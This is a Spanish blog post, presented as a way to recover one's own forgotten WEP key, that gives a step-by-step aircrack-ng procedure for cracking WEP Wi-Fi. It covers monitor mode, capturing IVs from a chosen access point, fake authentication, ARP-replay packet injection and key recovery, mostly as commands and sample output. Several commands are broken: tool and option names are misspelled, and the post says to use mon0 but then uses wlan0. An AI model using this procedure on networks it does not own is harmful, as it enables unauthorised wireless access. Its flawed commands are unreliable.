Como averiguar una clave WEP

Soy incapaz de recordar la clave almacenada para acceder a mi punto de acceso Wifi (AP).

  • Abro un terminal y trabajo como root
su
contraseña:
  • Necesito instalar las utilidades aircrack-ng que se encuentran en el repositorio ubuntu.
apt-get install aircrack-ng
  • La información de mi tarjeta de red inalámbrica la descubro de este modo:
airmon-ng
y obtengo este resultado, del que tomo nota:
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
  • Comenzamos poniendo nuestra tarjeta en modo monitor. Si mi tarjeta Wifi del portatil admite el modo monitor entonces tendremos ganado mucho terreno. En este enlace se relaciona las posibilidades que tenemos con nuestra tarjeta para descubrir la clave.
airmon-ng start wlan0
Nota: volvemos a lanzar el comando airmon-ng ahora sin parámetros y si el resultado es:

wlan0 Intel 3945ABG iwl3945 - [phy0]
mon0 Intel 3945ABG iwl3945 - [phy0]

hemos de utilizar el interfaz mon0 en todas las instrucciones que vienen a continuación pues en caso de usar wlan0, obtendremos errores de dispositivo ocupado:

ioctl(SIOCSIWMODE) failed: Device or resource busy
  • Empiezo escaneando las redes a nuestro alcance:
arodump-ng wlan0
y del resultado que obtengo me apunto los datos correspondientes a mi punto de acceso Wifi

BSSID Dirección MAC de mi AP
PWR Potencia de la señal
#Data Número de paquetes capturados.
CH Número de Canal
ENC Algoritmo de encriptación. OPN significa open, sin encriptación.
ESSID Nombre de la red
STATION La dirección MAC de usuarios conectados a un Punto.
  • Vamos a averiguar si el punto, además de estar encriptado, dispone de bloqueo de direcciones MAC. Lanzamos este comando:
aireplay-ng --fakeauth 0 -e [nombre Punto] -a [MAC Punto] wlan0
NOTA: la dirección MAC se escribe con el formato xx:xx:xx:....

Si el resultado es

21:48:38 Sending Authentication Request (Open System) [ACK]
21:48:38 Authentication successful
21:48:38 Sending Association Request [ACK]
21:48:38 Association successful :-) (AID: 1)

Significa que el punto de acceso no tiene bloqueo de MAC
  • Inicio la captura de paquetes pero sólo el tráfico de mi PA y no los de los demás. Así que ajusto los parámetros del comando a la mac y al canal de mi punto. la información de los paquetes capturados se vuelca en el fichero capturas. El parámetro --ivs es para que solo guarde en el fichero los paquete IV (vector de inicialización) que son los únicos útiles.
airodump-ng --ivs --chanel [Canal] --bssid [MAC Punto] -w capturas wlan0
  • Inyección de paquetes. Abrimos una segunda ventana de terminal. Para poder atacar la clave se necesitan un número elevado de paquetes IV y sólo con la captura el tráfico del punto puede ser una tarea eterna. Si inyectamos paquetes, se acelera la captura de los mismos y veremos crecer el valor #Data de la primera ventana.
aireplay-ng -3 -b [MAC Punto] -h [MAC portatil] wlan0
  • Análisis de las capturas. Hay que tener paciencia y esperar a que crezca el valor #Data de la primera ventana de terminal. Cuando alcance un valor importante de unos 10.000 podemos empezar a intentar el asalto a la clave:
aircrack-ng -Z capturas-01.ivs
Si el número de capturas es insuficiente, aircrack espera a tener más información y reincia el análisis y así hasta descubrir la clave.

No hay comentarios:

Publicar un comentario